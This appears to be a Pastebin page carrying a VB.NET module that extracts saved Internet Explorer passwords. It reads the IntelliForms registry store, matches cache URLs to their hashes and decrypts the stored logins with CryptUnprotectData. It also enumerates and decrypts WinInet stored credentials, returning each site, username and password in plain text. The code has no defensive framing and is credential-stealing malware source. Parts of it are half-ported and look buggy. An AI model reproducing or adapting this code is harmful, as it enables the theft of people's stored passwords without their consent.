API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jul 22nd, 2017
72
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VB.NET 17.17 KB | None | 0 0
raw download clone embed print report
  1.  
  2. Imports System.Runtime.InteropServices
  3. Imports System.Text
  4.  
  5. Module Module1
  6.  
  7.  
  8.  
  9.     Private Declare Sub CopyBytes Lib "msvbvm60" Alias "__vbaCopyBytes" (ByVal Size, ByRef Dest, ByRef Source)
  10.     Private Declare Function CryptUnprotectData Lib "crypt32" (ByRef pDataIn As DATA_BLOB, ByVal ppszDataDescr As Integer, ByVal pOptionalEntropy As Integer, ByVal pvReserved As Integer, ByVal pPromptStruct As Integer, ByVal dwFlags As Integer, ByRef pDataOut As DATA_BLOB) As Integer
  11.     Private Declare Function RegOpenKeyEx Lib "advapi32" Alias "RegOpenKeyExA" (ByVal hKey As Integer, ByVal lpSubKey As String, ByVal ulOptions As Integer, ByVal samDesired As Integer, ByRef phkResult As Integer) As Integer
  12.     Private Declare Function RegEnumValue Lib "advapi32" Alias "RegEnumValueA" (ByVal hKey As Integer, ByVal dwIndex As Integer, ByVal lpValueName As String, ByRef lpcbValueName As Integer, ByVal lpReserved As Integer, ByRef lpType As Integer, ByRef lpData As Byte, ByRef lpcbData As Integer) As Integer
  13.     Private Declare Function RegQueryValueEx Lib "advapi32" Alias "RegQueryValueExA" (ByVal hKey As Integer, ByVal lpValueName As String, ByVal lpReserved As Integer, ByRef lpType As Integer, ByRef lpData As Integer, ByRef lpcbData As Integer) As Integer
  14.     Private Declare Function CryptAcquireContext Lib "advapi32" Alias "CryptAcquireContextA" (ByRef phProv As Integer, ByVal pszContainer As Integer, ByVal pszProvider As String, ByVal dwProvType As Integer, ByVal dwFlags As Integer) As Integer
  15.     Private Declare Function CryptCreateHash Lib "advapi32" (ByVal hProv As Integer, ByVal Algid As Integer, ByVal hKey As Integer, ByVal dwFlags As Integer, ByRef phHash As Integer) As Integer
  16.     Private Declare Function CryptHashData Lib "advapi32" (ByVal hHash As Integer, ByVal pbData As Integer, ByVal dwDataLen As Integer, ByVal dwFlags As Integer) As Integer
  17.     Private Declare Function CryptGetHashParam Lib "advapi32" (ByVal hHash As Integer, ByVal dwParam As Integer, ByVal pByte As Integer, ByRef pdwDataLen As Integer, ByVal dwFlags As Integer) As Integer
  18.     Private Declare Function CryptSignHash Lib "advapi32" Alias "CryptSignHashA" (ByVal hHash As Integer, ByVal dwKeySpec As Integer, ByVal sDescription As Integer, ByVal dwFlags As Integer, ByVal pbSignature As Integer, ByRef pdwSigLen As Integer) As Integer
  19.     Private Declare Function CryptDestroyHash Lib "advapi32" (ByVal hHash As Integer) As Integer
  20.     Private Declare Function CryptReleaseContext Lib "advapi32" (ByVal hProv As Integer, ByVal dwFlags As Integer) As Integer
  21.     Private Declare Function CredEnumerate Lib "advapi32" Alias "CredEnumerateW" (ByVal lpszFilter As Integer, ByVal lFlags As Integer, ByRef pCount As Integer, ByRef lppCredentials As Integer) As Integer
  22.     Private Declare Function FindFirstUrlCacheEntry Lib "wininet" Alias "FindFirstUrlCacheEntryA" (ByVal lpszUrlSearchPattern As String, ByRef lpFirstCacheEntryInfo As Integer, ByRef lpdwFirstCacheEntryInfobufDataerSize As Integer) As Integer
  23.     Private Declare Function FindNextUrlCacheEntry Lib "wininet" Alias "FindNextUrlCacheEntryA" (ByVal hEnumHandle As Integer, ByRef lpNextCacheEntryInfo As Integer, ByRef lpdwNextCacheEntryInfobufDataerSize As Integer) As Integer
  24.     Private Declare Function lstrlenA Lib "kernel32" (ByVal ptr) As Integer
  25.     Private Declare Function lstrcpyA Lib "kernel32" (ByVal RetVal As String, ByVal ptr As Integer) As Integer
  26.     Private Declare Function SysAllocString Lib "oleaut32" (ByVal pOlechar As Integer) As String
  27.  
  28.     Private Structure FILETIME
  29.         Dim dwLowDateTime As Integer
  30.         Dim dwHighDateTime As Integer
  31.     End Structure
  32.     Private Structure StringIndexHeader
  33.         Dim dwWICK As Integer
  34.         Dim dwStructSize As Integer
  35.         Dim dwEntriesCount As Integer
  36.         Dim dwUnkId As Integer
  37.         Dim dwType As Integer
  38.         Dim dwUnk As Integer
  39.     End Structure
  40.     Private Structure StringIndexEntry
  41.         Dim dwDataOffset As Integer
  42.         Dim ftInsertDateTime As FILETIME
  43.         Dim dwDataSize As Integer
  44.     End Structure
  45.     Private Structure DATA_BLOB
  46.         Dim cbData As Integer
  47.         Dim pbData As Integer
  48.     End Structure
  49.     Private Structure CREDENTIAL
  50.         Dim dwFlags As Integer
  51.         Dim dwType As Integer
  52.         Dim lpstrTargetName As Integer
  53.         Dim lpstrComment As Integer
  54.         Dim ftLastWritten As FILETIME
  55.         Dim dwCredentialBlobSize As Integer
  56.         Dim lpbCredentialBlob As Integer
  57.         Dim dwPersist As Integer
  58.         Dim dwAttributeCount As Integer
  59.         Dim lpAttributes As Integer
  60.         Dim lpstrTargetAlias As Integer
  61.         Dim lpUserName As Integer
  62.     End Structure
  63.     Private Structure INTERNET_CACHE_ENTRY_INFO
  64.         Dim dwStructSize As Integer
  65.         Dim lpszSourceUrlName As Integer
  66.         Dim lpszLocalFileName As Integer
  67.         Dim CacheEntryType As Integer
  68.         Dim dwUseCount As Integer
  69.         Dim dwHitRate As Integer
  70.         Dim dwSizeLow As Integer
  71.         Dim dwSizeHigh As Integer
  72.         Dim LastModifiedTime As FILETIME
  73.         Dim ExpireTime As FILETIME
  74.         Dim LastAccessTime As FILETIME
  75.         Dim LastSyncTime As FILETIME
  76.         Dim lpHeaderInfo As Integer
  77.         Dim dwHeaderInfoSize As Integer
  78.         Dim lpszFileExtension As Integer
  79.         Dim dwExemptDelta As Integer
  80.     End Structure
  81.  
  82.     Private Const NORMAL_CACHE_ENTRY As Integer = &H1
  83.     Private Const URLHISTORY_CACHE_ENTRY As Integer = &H200000
  84.  
  85.  
  86.     Private Const HKEY_CURRENT_USER As Integer = &H80000001
  87.     Private Const IE_KEY As String = "Software\Microsoft\Internet Explorer\IntelliForms\Storage2"
  88.     Private Const READ_CONTROL As Integer = &H20000
  89.     Private Const SYNCHRONIZE As Integer = &H100000
  90.     Private Const KEY_ENUMERATE_SUB_KEYS As Integer = &H8
  91.     Private Const KEY_QUERY_VALUE As Integer = &H1
  92.     Private Const KEY_NOTIFY As Integer = &H10
  93.     Private Const KEY_READ As Integer = ((READ_CONTROL Or KEY_QUERY_VALUE Or KEY_ENUMERATE_SUB_KEYS Or KEY_NOTIFY) And (Not SYNCHRONIZE))
  94.     Private Const ERROR_SUCCESS As Integer = 0
  95.  
  96.     Private Const PROV_RSA_FULL As Integer = 1
  97.     Private Const ALG_CLASS_HASH As Integer = (4 * 2 ^ 13)
  98.     Private Const ALG_TYPE_ANY As Integer = 0
  99.     Private Const ALG_SID_SHA As Integer = 4
  100.     Private Const CALG_SHA As Integer = (ALG_CLASS_HASH Or ALG_TYPE_ANY Or ALG_SID_SHA)
  101.     Private Const HP_HASHVAL As Integer = &H2
  102.  
  103.     Private hKey As Integer
  104.     Private m_Data As String
  105.     Private m_Storage() As String
  106.     Private i As Short
  107.     Public Function GetIE() As String
  108.         Try        
  109.         Dim x As Short
  110.         Dim strOut() As String
  111.         Dim strSplit() As String
  112.         'Dim strHash() As String
  113.  
  114.         m_Data = vbNullString : Erase m_Storage : hKey = 0
  115.  
  116.             Call GetStorage2()
  117.  
  118.         Call GetCredentials()
  119.         If Len(m_Data) = 0 Then Exit Function
  120.         strOut = Split(m_Data, vbFormFeed)
  121.  
  122.             ReDim Preserve m_Storage(UBound(strOut) - 1)
  123.  
  124.         For i = 0 To UBound(strOut) - 1
  125.             strSplit = Split(strOut(i), vbVerticalTab)
  126.  
  127.             For x = 0 To UBound(m_Storage)
  128.                 If m_Storage(x) = strSplit(3) And m_Storage(x) <> "n/a" Then GoTo skipMsg
  129.             Next x
  130.  
  131.  
  132.             Return "URL: " & strSplit(0) & vbCrLf & "Username: " & strSplit(1) & vbCrLf & "Password: " & strSplit(2) & vbCrLf & "Hash: " & strSplit(3) & vbCrLf & vbCrLf
  133.  
  134. skipMsg:
  135.             m_Storage(i) = strSplit(3)
  136.             Next i
  137.         Catch ex As Exception
  138.             MsgBox(ex.ToString)
  139.         End Try
  140.     End Function
  141.     Private Sub GetCredentials()
  142.         Dim sRes, tmp, sURL As String
  143.         Dim tAuth() As String
  144.         Dim dwNumCreds, ptrData, lpCredentials As Integer
  145.         Dim bufData(36) As Short
  146.         Dim x As Short
  147.         Dim m_Cred As CREDENTIAL
  148.         Dim dataOut, dataIn, dataEntry As DATA_BLOB
  149.  
  150.         'Call CredEnumerate(Marshal.PtrToStringAuto("Microsoft_WinInet_*"), 0, dwNumCreds, lpCredentials)
  151.         Call CredEnumerate(StringToPointer("Microsoft_WinInet_*").ToInt32, 0, dwNumCreds, lpCredentials)
  152.         If 1 = 1 Then
  153.  
  154.             'For i = 0 To dwNumCreds - 1
  155.             For i = 0 To 100
  156.                 CopyBytes(4, VarPtr(ptrData), lpCredentials + (i) * 4)
  157.  
  158.                 CopyBytes(Marshal.SizeOf(m_Cred), VarPtr(m_Cred), ptrData)
  159.  
  160.                 sRes = CopyString(m_Cred.lpstrTargetName) : dataEntry.cbData = 74
  161.  
  162.                 For x = 0 To 36 : bufData(x) = CShort(Asc(Mid("abe2869f-9b47-4cd9-a358-c22904dba7f7" & vbNullChar, x + 1, 1)) * 4) : Next
  163.  
  164.  
  165.                 dataEntry.pbData = VarPtr(bufData(0)) : dataIn.pbData = m_Cred.lpbCredentialBlob : dataIn.cbData = m_Cred.dwCredentialBlobSize : dataOut.cbData = 0 : dataOut.pbData = 0
  166.                 Call CryptUnprotectData(dataIn, 0, VarPtr(dataEntry), 0, 0, 0, dataOut)
  167.  
  168.                 tmp = Space(dataOut.cbData \ 2 - 1)
  169.                 CopyBytes(dataOut.cbData, Marshal.PtrToStringAuto(tmp), dataOut.pbData)
  170.                 tAuth = Split(tmp, ":") : x = InStr(Mid(sRes, 19), "/")
  171.  
  172.                 If x > 0 Then
  173.                     sURL = Mid(sRes, 19, x - 1)
  174.                 Else
  175.                     sURL = Mid(sRes, 19)
  176.                 End If
  177.  
  178.                 m_Data = m_Data & sURL & vbVerticalTab & tAuth(0) & vbVerticalTab & tAuth(1) & vbVerticalTab & "n/a" & vbFormFeed
  179.                 MsgBox(m_Data)
  180.             Next
  181.         End If
  182.     End Sub
  183.     <DllImport("kernel32")> _
  184.     Private Function HeapAlloc(ByVal heap As IntPtr, ByVal flags As UInt32, ByVal bytes As UInt32) As IntPtr
  185.     End Function
  186.  
  187.     <DllImport("kernel32")> _
  188.     Private Function GetProcessHeap() As IntPtr
  189.     End Function
  190.     Private Function StringToPointer(ByVal str As [String]) As IntPtr
  191.         If str Is Nothing Then
  192.             Return IntPtr.Zero
  193.         Else
  194.             Dim encoding__1 As Encoding = Encoding.UTF8
  195.             Dim bytes As [Byte]() = encoding__1.GetBytes(str)
  196.             Dim length As UInteger = bytes.Length + 1
  197.             Dim pointer As IntPtr = HeapAlloc(GetProcessHeap(), 0, DirectCast(length, UInt32))
  198.             Marshal.Copy(bytes, 0, pointer, bytes.Length)
  199.             Marshal.WriteByte(pointer, bytes.Length, 0)
  200.             Return pointer
  201.         End If
  202.     End Function
  203.     Private Sub GetStorage2()
  204.         Dim sRet, tmp, sHash As String
  205.         Dim dwSize, m_Cache, cbData As Integer
  206.         Dim x, z As Short
  207.         Dim bufData() As Byte
  208.  
  209.         Dim m_URL As INTERNET_CACHE_ENTRY_INFO
  210.         If RegOpenKeyEx(HKEY_CURRENT_USER, IE_KEY, 0, KEY_READ, hKey) <> ERROR_SUCCESS Then Exit Sub
  211.  
  212.         Do
  213.             sRet = Space(4096)
  214.             If RegEnumValue(hKey, z, sRet, 4096, 0, 0, 0, 0) <> 0 Then Exit Do
  215.             sRet = StripTerminator(sRet)
  216.  
  217.             m_Cache = FindFirstUrlCacheEntry(vbNullString, 0, dwSize)
  218.             If dwSize Then
  219.                 ReDim bufData(dwSize - 1) : CopyBytes(4, bufData(0), dwSize)
  220.                 m_Cache = FindFirstUrlCacheEntry(vbNullString, bufData(0), dwSize)
  221.             Else
  222.                 Exit Sub
  223.             End If
  224.  
  225.             Do
  226.                 CopyBytes(Marshal.SizeOf(m_URL), m_URL, bufData(0))
  227.                 If (m_URL.CacheEntryType And (NORMAL_CACHE_ENTRY Or URLHISTORY_CACHE_ENTRY)) = (NORMAL_CACHE_ENTRY Or URLHISTORY_CACHE_ENTRY) Then
  228.                     tmp = Trim(GetStrFromPtrA(m_URL.lpszSourceUrlName))
  229.  
  230.                     x = InStr(tmp, "file://")
  231.                     If x Then GoTo Nxt
  232.                     x = InStr(tmp, "@")
  233.                     If x Then tmp = Mid(tmp, x + 1)
  234.                     x = InStr(tmp, "?")
  235.                     If x Then tmp = Left(tmp, x - 1)
  236.                     tmp = LCase(tmp)
  237.  
  238.                     sHash = GetSHA1Hash(Marshal.PtrToStringAuto(tmp), (Len(tmp) + 1) * 2)
  239.                     If sHash = sRet Then
  240.                         RegQueryValueEx(hKey, sHash, 0, 3, 0, cbData)
  241.                         If cbData Then Call DecryptData(tmp, sHash, cbData)
  242.                     Else
  243.                         tmp = tmp & "/"
  244.                         sHash = GetSHA1Hash(Marshal.PtrToStringAuto(tmp), (Len(tmp) + 1) * 2)
  245.                         If sHash = sRet Then
  246.                             RegQueryValueEx(hKey, sHash, 0, 3, 0, cbData)
  247.                             If cbData Then Call DecryptData(tmp, sHash, cbData) '.. We have data associated with hash, go.
  248.                         End If
  249.                     End If
  250.                 End If
  251.  
  252. Nxt:
  253.                 dwSize = 0 : Call FindNextUrlCacheEntry(m_Cache, 0, dwSize)
  254.                 If dwSize Then
  255.                     ReDim bufData(dwSize - 1)
  256.                     CopyBytes(4, bufData(0), dwSize)
  257.                 End If
  258.  
  259.             Loop While FindNextUrlCacheEntry(m_Cache, bufData(0), dwSize)
  260.  
  261.             z = z + 1
  262.         Loop
  263.     End Sub
  264.     Private Sub DecryptData(ByRef sURL As String, ByRef sHash As String, ByVal cbData As Integer)
  265.         Dim sUsername, sPassword As String
  266.         Dim ptrData, ptrEntry As Integer
  267.  
  268.         Dim hIndex As StringIndexHeader
  269.         Dim eIndex As StringIndexEntry
  270.         Dim dataOut, dataIn, dataEntry As DATA_BLOB
  271.  
  272.         Dim bufData() As Byte
  273.  
  274.         ReDim bufData(cbData - 1)
  275.         Call RegQueryValueEx(hKey, sHash, 0, 3, bufData(0), cbData)
  276.         dataIn.cbData = cbData
  277.         dataIn.pbData = VarPtr(bufData(0))
  278.         dataEntry.cbData = (Len(sURL) + 1) * 2
  279.         dataEntry.pbData = Marshal.PtrToStringAuto(sURL)
  280.         Call CryptUnprotectData(dataIn, 0, VarPtr(dataEntry), 0, 0, 0, dataOut)
  281.  
  282.         ReDim bufData(dataOut.cbData - 1)
  283.         CopyBytes(dataOut.cbData, bufData(0), dataOut.pbData)
  284.  
  285.         CopyBytes(Len(hIndex), hIndex, bufData(bufData(0)))
  286.  
  287.         If hIndex.dwType = 1 Then
  288.             If hIndex.dwEntriesCount >= 2 Then
  289.                 ptrEntry = VarPtr(bufData(bufData(0))) + hIndex.dwStructSize
  290.  
  291.                 ptrData = ptrEntry + hIndex.dwEntriesCount * Len(eIndex)
  292.                 If ptrData = 0 Or ptrEntry = 0 Then Exit Sub
  293.  
  294.                 For i = 1 To hIndex.dwEntriesCount / 2
  295.                     If i <> 1 Then ptrEntry = ptrEntry + Len(eIndex)
  296.  
  297.                     CopyBytes(Len(eIndex), eIndex, ptrEntry)
  298.                     sUsername = Space(eIndex.dwDataSize)
  299.                     If lstrlenA(ptrData + eIndex.dwDataOffset) <> eIndex.dwDataSize Then
  300.                         CopyBytes(eIndex.dwDataSize * 2, Marshal.PtrToStringAuto(sUsername), ptrData + eIndex.dwDataOffset)
  301.                     Else
  302.                         CopyBytes(eIndex.dwDataSize, sUsername, ptrData + eIndex.dwDataOffset)
  303.                     End If
  304.                     ptrEntry = ptrEntry + Len(eIndex)
  305.                     CopyBytes(Len(eIndex), eIndex, ptrEntry)
  306.                     sPassword = Space(eIndex.dwDataSize)
  307.                     If lstrlenA(ptrData + eIndex.dwDataOffset) <> eIndex.dwDataSize Then
  308.                         Call CopyBytes(eIndex.dwDataSize * 2, Marshal.PtrToStringAuto(sPassword), ptrData + eIndex.dwDataOffset)
  309.                     Else
  310.                         Call CopyBytes(eIndex.dwDataSize, sPassword, ptrData + eIndex.dwDataOffset)
  311.                     End If
  312.  
  313.                     m_Data = m_Data & sURL & vbVerticalTab & sUsername & vbVerticalTab & sPassword & vbVerticalTab & sHash & "/" & i & vbFormFeed
  314.                 Next i
  315.  
  316.             End If
  317.         End If
  318.     End Sub
  319.     Private Function GetSHA1Hash(ByVal pbData As Integer, ByVal dwDataLen As Integer) As String
  320.         Dim hProv, hHash As Integer
  321.         Dim bufData(20) As Byte
  322.  
  323.         Call CryptAcquireContext(hProv, 0, vbNullString, PROV_RSA_FULL, 0)
  324.         Call CryptCreateHash(hProv, CALG_SHA, 0, 0, hHash)
  325.         Call CryptHashData(hHash, pbData, dwDataLen, 0)
  326.         Call CryptGetHashParam(hHash, HP_HASHVAL, VarPtr(bufData(0)), 20, 0)
  327.         Call CryptDestroyHash(hHash)
  328.         Call CryptReleaseContext(hProv, 0)
  329.  
  330.         For i = 0 To 19 : GetSHA1Hash = GetSHA1Hash & Right("00" & Hex(bufData(i)), 2) : Next
  331.  
  332.         GetSHA1Hash = GetSHA1Hash & Right("00" & Hex(CheckSum(GetSHA1Hash)), 2)
  333.     End Function
  334.     Private Function CheckSum(ByRef s As String) As Byte
  335.         Dim sum As Integer
  336.  
  337.         For i = 1 To Len(s) Step 2 : sum = sum + Val("&H" & Mid(s, i, 2)) : Next
  338.         CheckSum = CByte(sum Mod 256)
  339.     End Function
  340.     Private Function StripTerminator(ByRef s As String) As String
  341.         Dim z As Short
  342.  
  343.         z = InStr(1, s, vbNullChar)
  344.         If z > 0 Then
  345.             StripTerminator = Left(s, z - 1)
  346.         Else
  347.             StripTerminator = s
  348.         End If
  349.     End Function
  350.     Private Function CopyString(ByVal ptr As Integer) As String
  351.         If ptr Then
  352.             'commented out cos of errors
  353.             'CopyString = StrConv(SysAllocString(ptr), vbFromUnicode)
  354.             MsgBox("possible error")
  355.         Else
  356.             CopyString = vbNullString
  357.         End If
  358.     End Function
  359.     Private Function GetStrFromPtrA(ByVal lpszA As Integer) As String
  360.         GetStrFromPtrA = New String(Chr(0), lstrlenA(lpszA))
  361.         Call lstrcpyA(GetStrFromPtrA, lpszA)
  362.     End Function
  363.  
  364.  
  365.     Public Function VarPtr(ByVal e As Object) As Integer
  366.         Dim GC As GCHandle = GCHandle.Alloc(e, GCHandleType.Pinned)
  367.         Dim GC2 As Integer = GC.AddrOfPinnedObject.ToInt32
  368.         GC.Free()
  369.         Return GC2
  370.     End Function
  371. End Module
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!